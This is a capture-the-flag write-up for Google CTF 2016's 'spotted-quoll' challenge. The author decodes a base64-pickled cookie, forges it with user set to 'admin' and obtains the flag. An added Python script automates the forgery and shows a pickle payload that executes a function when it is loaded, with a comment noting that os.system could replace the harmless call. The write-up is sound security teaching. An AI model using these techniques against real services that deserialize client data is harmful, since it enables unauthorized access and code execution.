First write-up from: Google CTF 2016
Challenge link: https://spotted-quoll.ctfcompetition.com/
After opening the dev tools in Chrome I began to look around the simple site. The thing that stood out was that clicking the ‘Admin’ link landed me on the following page: https://spotted-quoll.ctfcompetition.com/#err=user_not_found
While being redirected to that page you are issued a cookie called ‘ObsoletePickle’. It appeared to be encoded somehow; decoding it as base64 gave some useful information.
Encoded:
KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu
Decoded:
"(dp1\nS'python'\np2\nS'pickles'\np3\nsS'subtle'\np4\nS'hint'\np5\nsS'user'\np6\nNs."
Going from the hint in this string I looked into ‘python pickles’ and found that pickle is Python’s native object serialization format, used to store objects and ship them between Python processes. Unlike JSON, a pickle is a small program for a stack machine that the unpickler executes, which is why a server should never unpickle something the client controls, such as a cookie. After playing with pickle in Python for a while I unpickled the cookie and got back the object that had been fed to the pickler:
{'python': 'pickles', 'subtle': 'hint', 'user': None}
Without the opcode noise it is clearly a dict with three key/value pairs, and the value of the last one, ‘user’, is None (Python’s null).
Returning to the ‘#err=user_not_found’ from earlier, I had an idea of where to go with it. Since the link I had clicked was to the ‘Admin’ page, I replaced the None with the name ‘admin’ and regenerated the pickle:
{'python': 'pickles', 'subtle': 'hint', 'user': 'admin'}
Once I had the new pickle (which ends S'user'\np6\nS'admin'\np7\ns. instead of S'user'\np6\nNs.), I base64-encoded it and manually set my cookie to that value:
KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKUydhZG1pbicKcDcKcy4=
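The whole procedure above (base64-decode, unpickle, edit the dict, re-pickle, base64-encode) as a script, added here as an example and not part of the original write-up. It assumes the cookie value printed above is exact and hand-rolls the protocol-0 pickle so the result matches Python 2 cPickle byte for byte (memo numbers starting at 1, S/N/s opcodes) regardless of which Python version runs it; the pickle0_dict, decode_cookie, forge_admin_cookie and unpickle_runs_code names are mine. The last function shows why a pickle cookie is a code-execution bug and not merely a tampering one: a pickle can name any importable callable and call it.

```python
import base64
import os
import pickle

# The ObsoletePickle cookie as issued by the challenge (copied from the write-up).
ORIGINAL_COOKIE = (
    "KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0"
    "ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu"
)


def decode_cookie(cookie):
    """base64-decode the cookie and unpickle it, as the server must be doing.

    Never do this with untrusted input outside a CTF: pickle.loads executes
    whatever callables the pickle names (see unpickle_runs_code below).
    """
    return pickle.loads(base64.b64decode(cookie))


def pickle0_dict(d):
    """Serialise a dict with str keys and str/None values as a protocol-0
    pickle, byte for byte as Python 2's cPickle would.

    Opcodes used: ( MARK, d DICT, pN PUT (memoise), S STRING, N NONE,
    s SETITEM, . STOP.  Memo numbering starts at 1 because the cookie does.
    Only the value types present in the cookie are handled (assumption).
    """
    out = b"(dp1\n"            # MARK, empty DICT, memoise the dict as #1
    memo = 2
    for key, value in d.items():
        for item in (key, value):
            if item is None:
                out += b"N"     # NONE is not memoised
            elif isinstance(item, str):
                # STRING carries repr() of the value, then a PUT for the memo
                out += b"S" + repr(item).encode("ascii") + b"\n" + b"p%d\n" % memo
                memo += 1
            else:
                raise TypeError("only str and None values are handled")
        out += b"s"             # SETITEM: dict[key] = value
    return out + b"."           # STOP


def encode_cookie(d):
    """Pickle the dict and base64-encode it into a cookie value."""
    return base64.b64encode(pickle0_dict(d)).decode("ascii")


def forge_admin_cookie():
    """Decode the issued cookie, set user to 'admin', re-encode it."""
    d = decode_cookie(ORIGINAL_COOKIE)
    d["user"] = "admin"
    return encode_cookie(d)


def unpickle_runs_code():
    """A protocol-0 pickle that calls os.getcwd() when loaded.

    c GLOBAL pushes os.getcwd, ( MARK and t TUPLE build an empty argument
    tuple, R REDUCE calls it.  os.getcwd is a harmless stand-in for os.system;
    the cookie in this challenge could carry exactly this kind of payload.
    """
    payload = b"cos\ngetcwd\n(tR."
    return pickle.loads(payload) == os.getcwd()


if __name__ == "__main__":
    print(decode_cookie(ORIGINAL_COOKIE))
    print(forge_admin_cookie())
    print("unpickling ran code:", unpickle_runs_code())
```

Running the script prints the original dict with user=None and the forged cookie value; swap the latter in for ObsoletePickle in the browser and reload the admin page.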
I was then able to go to the ‘admin’ page and the flag was presented!
CTF{but_wait,theres_more.if_you_call}